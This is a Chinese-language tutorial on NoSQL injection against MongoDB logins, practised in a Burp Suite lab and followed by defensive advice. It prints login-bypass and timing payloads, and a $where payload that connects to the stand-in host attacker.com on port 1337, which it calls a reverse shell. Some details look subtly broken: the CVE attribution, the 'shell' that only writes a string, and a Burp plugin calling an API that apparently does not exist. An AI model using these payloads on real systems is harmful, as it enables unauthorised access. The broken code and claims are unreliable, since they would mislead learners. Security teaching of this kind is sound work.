一、NoSQL注入：被忽视的数据库安全威胁

1.1 NoSQL数据库的崛起与安全挑战

随着大数据与微服务架构的普及，MongoDB、Redis等NoSQL数据库凭借灵活的数据模型与横向扩展能力，逐渐取代传统关系型数据库成为主流。然而，其非结构化查询语言（如MongoDB的BSON查询）和动态Schema特性，使得传统SQL注入防御机制失效，催生了新型注入攻击——NoSQL注入。

攻击原理：NoSQL注入通过构造恶意查询条件，绕过应用层验证，直接操作数据库。例如，MongoDB的$where操作符允许执行JavaScript代码，攻击者可利用此特性实现远程代码执行（RCE）。

1.2 Burp Suite靶场：安全测试的黄金标准

Burp Suite作为Web安全测试的集成平台，其靶场模块提供了模拟真实场景的漏洞环境。通过Burp的Proxy拦截、Repeater重放、Intruder自动化测试等功能，可高效复现NoSQL注入攻击流程。

二、Burp靶场NoSQL注入实战：从原理到复现

2.1 靶场环境搭建与攻击面分析

以DVWA-NoSQL靶场为例，其用户登录模块存在MongoDB注入漏洞。攻击面包括：

• 用户名参数：username=admin可能被注入{"$ne": ""}绕过验证。
• 密码参数：password=123可能被替换为{"$gt": ""}触发逻辑错误。

2.2 攻击步骤详解

步骤1：信息收集与参数定位

通过Burp的Proxy模块拦截登录请求，定位username和password参数：

POST /login HTTP/1.1
Host: target.com
Content-Type: application/json
{"username": "admin", "password": "123"}

步骤2：构造注入Payload

• 布尔盲注：利用$ne（不等于）操作符绕过验证：

  {"username": {"$ne": ""}, "password": {"$ne": ""}}

  若返回成功，说明参数存在注入点。

• 时间盲注：结合$where执行耗时操作（需靶场支持JavaScript）：

  {"username": "admin", "password": {"$where": "sleep(5000)"}}

  通过响应延迟判断注入是否生效。

步骤3：自动化测试与数据提取

使用Burp Intruder的Pitchfork模式，对username和password参数进行多位置攻击：

1. 配置Payload集：
   • Payload Set 1: admin, "", {"$ne": ""}
   • Payload Set 2: 123, "", {"$gt": ""}
2. 启动攻击，观察响应长度差异，确认有效Payload。

2.3 攻击案例：MongoDB RCE漏洞利用

若靶场使用存在CVE-2019-10758漏洞的MongoDB版本，攻击者可构造以下Payload执行系统命令：

{"username": "admin", "password": {"$where": "function() { var net = require('net'); var socket = new net.Socket(); socket.connect(1337, 'attacker.com', function() { socket.write('RCE'); socket.end(); }); }"}}

通过Burp的Repeater模块发送请求，监听攻击者服务器的1337端口，验证反向Shell连接。

三、防御策略：从代码到架构的多层防护

3.1 输入验证与参数化查询

• 严格类型检查：禁止JSON对象直接传入查询参数，强制使用字符串或数字类型。
• 参数化查询：使用MongoDB官方驱动的参数绑定功能：

  // 安全示例
  const username = req.body.username;
  db.collection('users').findOne({ username: username });

3.2 最小权限原则与网络隔离

• 数据库用户权限：限制应用账号仅能执行必要操作（如find而非eval）。
• 网络分段：将数据库服务器置于内网，通过API网关暴露受限接口。

3.3 运行时防护与日志监控

• WAF规则配置：在Burp或云WAF中添加NoSQL注入特征检测规则，如拦截包含$where、$function等操作符的请求。
• 异常日志分析：记录所有数据库查询，使用ELK栈实时检测异常模式（如高频$ne查询）。

四、进阶技巧：Burp插件开发与自动化扫描

4.1 自定义Burp插件检测NoSQL注入

通过Burp Extender API开发插件，自动识别JSON请求中的危险操作符：

public class NoSQLScanner implements IHttpListener {
    @Override
    public void processHttpMessage(int toolFlag, boolean messageIsRequest, IHttpRequestResponse messageInfo) {
        if (messageIsRequest) {
            String request = messageInfo.getRequest().toString();
            if (request.contains("$where") || request.contains("$function")) {
                IInterceptionPoint.addAlert("Potential NoSQL Injection", messageInfo);
            }
        }
    }
}

4.2 结合其他工具增强测试

• NoSQLMap：专用NoSQL注入工具，支持MongoDB、Redis等数据库的自动化测试。
• JSQL Injection：扩展支持NoSQL注入的开源扫描器，可与Burp联动使用。

五、总结与展望

NoSQL注入作为新兴攻击向量，其危害不亚于传统SQL注入。通过Burp Suite靶场的实战演练，开发者可深入理解攻击原理，掌握从手动测试到自动化防御的全流程技能。未来，随着NoSQL数据库的广泛应用，安全测试需更加关注非关系型数据库的特有风险，结合静态分析（SAST）和动态应用安全测试（DAST）构建纵深防御体系。

行动建议：

1. 立即检查项目中是否存在直接拼接JSON查询的代码。
2. 在Burp中配置NoSQL注入专用扫描规则。
3. 定期参与CTF比赛中的NoSQL注入挑战，提升实战能力。